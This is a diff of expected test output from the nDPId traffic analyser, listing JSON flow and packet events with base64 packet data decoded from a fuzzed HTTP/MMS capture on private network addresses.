00886{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":36,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854495447,"flow_last_seen":1031854495447,"flow_idle_time":7440000,"flow_min_l4_payload_len":708,"flow_max_l4_payload_len":708,"flow_tot_l4_payload_len":708,"flow_avg_l4_payload_len":708,"midstream":1,"thread_ts_msec":1031854495447,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2602,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"172.20.3.13","url":"172.20.3.13.servlets\/mms","code":0,"content_type":"","user_agent":""}}
@@ -48,10 +48,10 @@
00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":49,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1031854514843,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1031854514843,"pkt":"AFCLk5N8CAAgsl17CABFAAAsxLxAAEAGF9WsFAMNrBQDBQBQCivKHToI5Klq0WASgyxYkwAAAgQFtA=="} 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":49,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1031854514843,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1031854514843,"pkt":"AFCLk5N8CAAgsl17CABFAAAsxLxAAEAGF9WsFAMNrBQDBQBQCivKHToI5Klq0WASgyxYkwAAAgQFtA=="}
00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":50,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854514843,"flow_last_seen":1031854514843,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854514843,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.77","src_port":2603,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":50,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854514843,"flow_last_seen":1031854514843,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854514843,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.77","src_port":2603,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1031854514843,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1031854514843,"pkt":"CAAgsl17AFCLk5N8CABFAAAoFEtAAIAGiEqsFAMFrBQDTQorAFDkqWrRyh06CVAQIjjRRAAAAgQFtGDD"} 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1031854514843,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1031854514843,"pkt":"CAAgsl17AFCLk5N8CABFAAAoFEtAAIAGiEqsFAMFrBQDTQorAFDkqWrRyh06CVAQIjjRRAAAAgQFtGDD"}
02321{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":51,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":1514,"pkt_l4_len":0,"thread_ts_msec":1031854514843,"pkt":"CAAgsl17AFCLk5N8CABFAAXcFaqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="} 02307{"packet_event_id":1,"packet_event_name":"packet","packet_id":51,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":1514,"pkt_l4_len":0,"thread_ts_msec":1031854514843,"pkt":"CAAgsl17AFCLk5N8CABFAAXcFaqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="}
00232{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":51,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","l4_data_len":1480,"global_ts_msec":1031854514844} 00218{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":51,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","l4_data_len":1480,"global_ts_msec":1031854514844}
00939{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":52,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":479,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":479,"pkt_l4_len":0,"thread_ts_msec":1031854514843,"pkt":"CAAgsl0lcwCLk5N8CABFAAHRFktVAIAGhKGsFAMFrBQDDQorAFDkqXCFyh06CVAYIo+iDAAAMjAxLnhtbCIsIjEtT3dQVndnTWs4aXRxR3gwOGZNWXVmdz09IiwiMi1IZ0NURVFFMW8ydmVOM0ZCeW8xLzVnPT0iLCIzLXpJdGdzSXlLQnBCem01c2xPb2RISEE9PSINCkNvb2tpZTpKVXNlci1JZGVudGl0eS1Gb3J3YXJkLXBwcC11c2VybmFtZT2qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="} 00925{"packet_event_id":1,"packet_event_name":"packet","packet_id":52,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":479,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":479,"pkt_l4_len":0,"thread_ts_msec":1031854514843,"pkt":"CAAgsl0lcwCLk5N8CABFAAHRFktVAIAGhKGsFAMFrBQDDQorAFDkqXCFyh06CVAYIo+iDAAAMjAxLnhtbCIsIjEtT3dQVndnTWs4aXRxR3gwOGZNWXVmdz09IiwiMi1IZ0NURVFFMW8ydmVOM0ZCeW8xLzVnPT0iLCIzLXpJdGdzSXlLQnBCem01c2xPb2RISEE9PSINCkNvb2tpZTpKVXNlci1JZGVudGl0eS1Gb3J3YXJkLXBwcC11c2VybmFtZT2qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="}
00231{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":52,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","l4_data_len":445,"global_ts_msec":1031854514844} 00217{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":52,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","l4_data_len":445,"global_ts_msec":1031854514844}
00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":53,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1031854514845,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1031854514845,"pkt":"AFCLk5N8CAAgsl17CABFIAAoxL1AAEAGF9isFAMNrBQDBQBQCivKHToJ5KlwhVAQgyxqnAAA"} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":53,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1031854514845,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1031854514845,"pkt":"AFCLk5N8CAAgsl17CABFIAAoxL1AAEAGF9isFAMNrBQDBQBQCivKHToJ5KlwhVAQgyxqnAAA"}
00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":56,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854525903,"flow_last_seen":1031854525903,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854525903,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"72.20.3.13","src_port":2603,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":56,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854525903,"flow_last_seen":1031854525903,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854525903,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"72.20.3.13","src_port":2603,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":56,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1031854525903,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1031854525903,"pkt":"CAAgsl17AFCLk5N8CABFAAAoGktAAIAGgkqsFAMFSBQDDQorAFDkqXIuyh06mFARIanJ5gAApxaHSO7L"} 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":56,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1031854525903,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1031854525903,"pkt":"CAAgsl17AFCLk5N8CABFAAAoGktAAIAGgkqsFAMFSBQDDQorAFDkqXIuyh06mFARIanJ5gAApxaHSO7L"}
@@ -64,26 +64,26 @@
00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":61,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1031854532142,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1031854532142,"pkt":"AFCLk5N8CAAgsl17CABFAAAsxMFAAEAGF9CsFAMNrBQDBQBQCizKXurZ5OatpWASgyxkbgAAAgQFtA=="} 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":61,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1031854532142,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1031854532142,"pkt":"AFCLk5N8CAAgsl17CABFAAAsxMFAAEAGF9CsFAMNrBQDBQBQCizKXurZ5OatpWASgyxkbgAAAgQFtA=="}
00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":62,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":3,"flow_last_seen":1031854532142,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1031854532142,"pkt":"CAAgsl17AFCLk5N8CABFAAAoH0tAAIAGfUqsFAMFrBQDDQosAFDk5q2lyl7q2lAQIjjdHwAAAgQFtGDD"} 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":62,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":3,"flow_last_seen":1031854532142,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1031854532142,"pkt":"CAAgsl17AFCLk5N8CABFAAAoH0tAAIAGfUqsFAMFrBQDDQosAFDk5q2lyl7q2lAQIjjdHwAAAgQFtGDD"}
00927{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":63,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1031854532142,"flow_last_seen":1031854532143,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1460,"flow_avg_l4_payload_len":365,"midstream":0,"thread_ts_msec":1031854532143,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2604,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"172.20.3.13","url":"172.20.3.13\/servlets\/mms?message-id=189001","code":0,"content_type":"","user_agent":"SonyEricssonT68\/R201A"}} 00927{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":63,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1031854532142,"flow_last_seen":1031854532143,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1460,"flow_avg_l4_payload_len":365,"midstream":0,"thread_ts_msec":1031854532143,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2604,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"172.20.3.13","url":"172.20.3.13\/servlets\/mms?message-id=189001","code":0,"content_type":"","user_agent":"SonyEricssonT68\/R201A"}}
00852{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":64,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":413,"pkt_type":59136,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":413,"pkt_l4_len":0,"thread_ts_msec":1031854532143,"pkt":"CAAgsl17AFCLk5N85wA1AAGPIUtAAIAGeeOsFAMFrBQDDQosAFDk5rNZyl7q2lAYIjgNigAAWXVTdz09IiwiMi1gZ0NURVFFMW8ydmVOM0ZCeW8xLzVnPT0iLCIzLXpJdGdzSXlLQnBCem01c2xPb2RISEE9PSINCkNvb2t6ZTogVXNlci1JZGVudGl0eS1Gb3J3YXJkLXBwcC11c2VybmFtZT02QzZENjM2RDZGNkM2Ng0KQ29va2llOiBVc2VyLUlkZW50aXR5LUZvcgRhcmQtbXNpc2RuPTO0MzkzMTM3MzIzNjMxMzAzMTMwMzAzNA0KQ29va2llOiBVc2VyLQlkZW50aXR5LUF1dGhlbnRpY2F0aW9uPUJlYXJlcg0KQ29va2llOiBJcC1BZGRyZXNzPTE5Mi4xNjguMi4yNg0KQ29va2llOiBCZWFyZXItVHlwZT1VRFBdCldBUC1Db25uZWN0aW9uOiBTdGFjay1UeXBlPUNPDQpDb29raWU6IHd0bHMtc2VjdXJpdHktbGV2ZWw9bm9uZVQKDQo="} 00838{"packet_event_id":1,"packet_event_name":"packet","packet_id":64,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":413,"pkt_type":59136,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":413,"pkt_l4_len":0,"thread_ts_msec":1031854532143,"pkt":"CAAgsl17AFCLk5N85wA1AAGPIUtAAIAGeeOsFAMFrBQDDQosAFDk5rNZyl7q2lAYIjgNigAAWXVTdz09IiwiMi1gZ0NURVFFMW8ydmVOM0ZCeW8xLzVnPT0iLCIzLXpJdGdzSXlLQnBCem01c2xPb2RISEE9PSINCkNvb2t6ZTogVXNlci1JZGVudGl0eS1Gb3J3YXJkLXBwcC11c2VybmFtZT02QzZENjM2RDZGNkM2Ng0KQ29va2llOiBVc2VyLUlkZW50aXR5LUZvcgRhcmQtbXNpc2RuPTO0MzkzMTM3MzIzNjMxMzAzMTMwMzAzNA0KQ29va2llOiBVc2VyLQlkZW50aXR5LUF1dGhlbnRpY2F0aW9uPUJlYXJlcg0KQ29va2llOiBJcC1BZGRyZXNzPTE5Mi4xNjguMi4yNg0KQ29va2llOiBCZWFyZXItVHlwZT1VRFBdCldBUC1Db25uZWN0aW9uOiBTdGFjay1UeXBlPUNPDQpDb29raWU6IHd0bHMtc2VjdXJpdHktbGV2ZWw9bm9uZVQKDQo="}
00213{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":64,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","layer_type":59136,"global_ts_msec":1031854532143} 00199{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":64,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","layer_type":59136,"global_ts_msec":1031854532143}
00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":65,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854532143,"flow_last_seen":1031854532143,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854532143,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.68.5","src_port":80,"dst_port":2604,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 